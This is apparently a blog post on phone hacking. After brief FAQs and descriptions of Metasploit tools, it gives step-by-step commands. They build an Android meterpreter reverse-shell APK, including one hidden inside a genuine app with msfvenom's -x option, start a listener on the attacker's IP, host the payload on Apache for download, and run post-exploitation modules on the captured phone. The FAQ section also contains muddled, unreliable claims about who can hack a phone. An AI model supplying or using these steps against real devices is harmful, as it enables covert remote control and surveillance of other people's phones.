Phone hacking is the practice of manipulating or gaining unauthorized access to mobile phones, such as by intercepting telephone calls or accessing voicemail messages.

Can someone hack your cell phone?

Sure, someone can hack your phone and read your text messages from his phone. But the person using this cell phone must not be a stranger to you. No one is allowed to trace, track or monitor someone else’s text messages. … Using cell phone tracking apps is the most well-known method of hacking someone’s smartphone.

Can a mobile number be hacked?

All hackers need your cell phone is just your cell number. A hacker can hack your phone with just your phone number in many different ways: Hacker can send you spam send via text. … If a hacker gets into SS7, then it is very easy to track the incoming & outgoing conversation.

Metasploit Project – Metasploit Framework

Metasploit Framework, the Metasploit Project’s best-known creation, is a software platform for developing, testing, and executing exploits. It can be used to create security testing tools and exploit modules and also as a penetration testing system. It was originally created as a portable network tool in 2003 by HD Moore.

https://www.hackingtutorials.org/metasploit-tutorials/metasploit-commands/

Auxiliary modules

Auxiliary modules are a fascinating feature of the framework allowing it to extend for a variety of purposes other than exploitation. You can create your own quick vulnerability scanners, port scanners, make MSF work as an FTP, HTTP or SMTP client and do a whole lot of other cool stuff.

Metasploit

Metasploit helps deliver our exploit payloads against a target system. When creating an Exploit Payload, we have several things to consider, from the operating system architecture, to anti-virus, IDS, IPS, etc. … Metasploit comes with a number of payload encoders and NOP generators to help aid us in this area.

MSFencode

MSFencode is another great little tool in the framework’s arsenal when it comes to exploit development. Most of the time, one cannot simply use shellcode generated straight out of msfpayload. It needs to be encoded to suit the target in order to function properly. This can mean transforming your shellcode into pure alphanumeric, getting rid of bad characters or encoding it for 64-bit target.

https://www.offensive-security.com/metasploit-unleashed/msfencode/

Meterpreter

Meterpreter is an advanced, dynamically extensible payload that uses in-memory DLL injection stagers and is extended over the network at runtime. It communicates over the stager socket and provides a comprehensive client-side Ruby API.

Payload

A payload is a piece of code to be executed through said exploit. Have a look at the Metasploit Framework. It is simply a collection of exploits and payloads. Each exploit can be attached with various payloads like reverse or bind shells, the meterpreter shell etc.

1.To create a payload through msf venom

# msfvenom -p android/meterpreter/reverse_tcp LHOST=____ LPORT=____ X > /root/Desktop/nameofthepayload.apk

# msfvenom -x -Path of the genuine application- -p android/meterpreter/reverse_tcp LHOST=____ LPORT=____ X > /root/Desktop/nameofthepayload.apk

# LHOST local ip of your machine (hacker’s IP)

# LPORT local port according to your need above 1000

2.To run Metasploit for listening port

– msfconsole

– use exploit/multi/handler

– set payload android/meterpreter/reverse_tcp

– show options

– set LHOST ____  # Attacker’s IP local machine IP

– set LPORT ____  # Attacker’s Port to listen which is given in the msfvenom payload time

– exploit

3.To host your payload in local network in kali linux

-copy the payload and move it to /var/www/html/ directory in your computer(Directory)

-to run apache service in kali

– service apache2 start/status/stop

4.Post exploitation in mobile phones

– when your in meterpreter session and try to perform post exploitation follow the commands

– background

– use post/multi/manage/set_wallpaper

– show options

– set SESSION ____    # set the session which is given before using background

– set WALLPAPERS ____ # give the path of the image which you want to exploit

– exploit

-by Partho Mandal

By admin

Leave a Reply

Your email address will not be published. Required fields are marked *